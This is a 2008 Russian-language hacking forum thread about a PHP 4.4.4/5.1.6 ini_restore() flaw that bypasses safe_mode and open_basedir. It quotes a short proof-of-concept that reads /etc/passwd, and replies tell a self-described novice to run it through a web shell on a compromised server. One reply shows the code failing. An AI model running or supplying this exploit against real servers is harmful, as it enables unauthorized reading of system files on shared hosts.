PHP 5.1.6 Exploit

Discussion in 'Уязвимости' started by fasty, 11 Jun 2008.

  1. fasty

    fasty Member

    Joined:
    9 May 2008
    Messages:
    0
    Likes Received:
    6
    Reputations:
    -10
    Нужна помощь)
    Каким образом воплотить в жизнь Exploit?

    Программа:
    PHP 4.4.4 и более ранние версии
    PHP 5.1.6 и более ранние версии

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователь получить доступ к важным данным на системе.

    Уязвимость существует из-за недостаточного ограничения на смену параметров safe_mode и open_basedir в функции ini_restore(). Если эти ограничения установлены в настройках виртуального хоста Web сервера, а в файле php.ini находятся значения по умолчанию, злоумышленник может восстановить значения по умолчанию и обойти ограничения, установленный в конфигурационном файле Web сервера. Пример уязвимой конфигурации:
    <Directory /usr/home/frajer/public_html/>
    Options FollowSymLinks MultiViews Indexes
    AllowOverride None
    php_admin_flag safe_mode 1
    php_admin_value open_basedir /usr/home/frajer/public_html/
    </Directory>
    Эксплоит:
    Код
    PHP:
    <?
    echo 
    ini_get("safe_mode");
    echo 
    ini_get("open_basedir");
    include(
    "/etc/passwd");
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    echo 
    ini_get("safe_mode");
    echo 
    ini_get("open_basedir");
    include(
    "/etc/passwd");
    ?>
    Удачная эксплуатация уязвимости позволит злоумышленнику получить доступ к содержимому произвольных файлов на системе.

    Если можно пошагово опишите я новичёк...
    С помощью какой проги или чё устанавливать чтобы это зделать) Нигде не могу найти ..

    Спасибо.
     
  2. LEE_ROY

    LEE_ROY Elder - Старейшина

    Joined:
    9 Nov 2006
    Messages:
    450
    Likes Received:
    188
    Reputations:
    26
    с помощью шелла на серваке с уязвимой версией пыха, эта бага для обхода сейф моде всеголиш
     
    3 people like this.
  3. fasty

    fasty Member

    Joined:
    9 May 2008
    Messages:
    0
    Likes Received:
    6
    Reputations:
    -10
    Темку можеш дать где проэто почитать или напиши по пунктам чё зделать)

    Спасибо)
     
  4. Arrest

    Arrest New Member

    Joined:
    6 Jun 2008
    Messages:
    5
    Likes Received:
    3
    Reputations:
    3
    Сайты с ее помощью ломать нельзя. А так - просто заливаешь на сервер и читаешь файлики.
     
  5. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    если в php.ini нет сейфмода а в httpd.conf к примеру стоит php_value safe_mode "1"
    то с помощью этой баги можно попробовать востановить значение опции safe_mode. практически это выглядит так- вставляешь в шел эти строчки и юзаешь его без сейф мода.
     
    1 person likes this.
  6. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    попробовал на PHP 5.1.6 чето не канает
    выдает
    1/home/хост/vhosts/:/var/lib/php:/usr/lib/php:/usr/local/lib/php:/tmp/:/usr/share/pear/
    Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/home/хост/vhosts/:/var/lib/php:/usr/lib/php:/usr/local/lib/php:/tmp/:/usr/share/pear/) in /home/хост/vhosts/имяакка/1.php on line 4

    Fatal error: Can't load /etc/passwd, open_basedir restriction. in /home/хост/vhosts/имяакка/1.php on line 4
     
  7. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    логично , значит чето не канает .
     
    1 person likes this.